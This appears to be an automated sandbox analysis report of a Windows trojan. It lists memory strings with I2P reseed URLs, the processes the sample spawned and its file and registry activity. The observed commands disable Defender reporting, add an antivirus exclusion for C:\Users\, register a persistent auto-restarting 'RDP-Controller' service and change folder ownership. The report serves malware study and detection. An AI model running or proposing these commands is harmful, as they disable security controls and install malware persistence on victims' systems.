Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txt/
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txt2
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtR
Source: main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtp_lib.c
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://banana.incognet.io/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://i2p.ghativega.in/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://i2p.novg.net/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed.diva.exchange/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed.i2pgit.org/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed.memcpy.io/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed.onion.im/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed.stormycloud.org/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://reseed2.i2p.net/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	String found in binary or memory: https://www2.mk16.de/

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFB929A inet_addr,ntohl,

5_2_00007FF73AFB929A

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFB292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,

5_2_00007FF73AFB292E

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\zFE1sfMY

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02FA53EA	0_2_02FA53EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F94B4E	0_2_02F94B4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F95B42	0_2_02F95B42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F960D2	0_2_02F960D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02FA701E	0_2_02FA701E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02FAD122	0_2_02FAD122
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F97F32	0_2_02F97F32
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F99CFA	0_2_02F99CFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F9CDAA	0_2_02F9CDAA
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFBE4E0	5_2_00007FF73AFBE4E0
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFBDE8A	5_2_00007FF73AFBDE8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6EF65C440	23_2_00007FF6EF65C440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6EF661AB0	23_2_00007FF6EF661AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E140880	23_2_00007FFE0E140880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1724D0	23_2_00007FFE0E1724D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0EB4EF60	23_2_00007FFE0EB4EF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11ECEAA0	23_2_00007FFE11ECEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D8F0E	23_2_00007FFE126D8F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D8FFC	23_2_00007FFE126D8FFC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126E0480	23_2_00007FFE126E0480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D8CDB	23_2_00007FFE126D8CDB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D8DC6	23_2_00007FFE126D8DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1338CB10	23_2_00007FFE1338CB10

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: String function: 00007FF73AFB14E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0E16C852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0EB49DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF6EF652EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0E1340D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE13382072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11EC1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE126D77A2 appears 388 times

Source: evtsrv.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: TLN3Eh0f.23.dr	Static PE information: Number of sections : 11 > 10
Source: zCUeqzwC.23.dr	Static PE information: Number of sections : 11 > 10
Source: Jcf8nu5c.23.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: zFE1sfMY.23.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: DYoNFfUY.23.dr	Static PE information: Number of sections : 11 > 10
Source: j8fz8FfX.23.dr	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: file.exe	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: kInii6kX.23.dr	Static PE information: Number of sections : 11 > 10
Source: samctl.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.dr	Static PE information: Number of sections : 11 > 10
Source: 9qaNW6z6.23.dr	Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000002.1731999291.0000000002D5A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000000.00000000.1728129263.0000000000E1C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe

Source: classification engine

Classification label: mal96.troj.evad.winEXE@38/136@0/58

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFB855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,

5_2_00007FF73AFB855D

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFB1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

5_2_00007FF73AFB1A19

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF6EF651DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF6EF651DBC

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF6EF651DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF6EF651DBC

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

File read: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe "C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe"
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe "C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
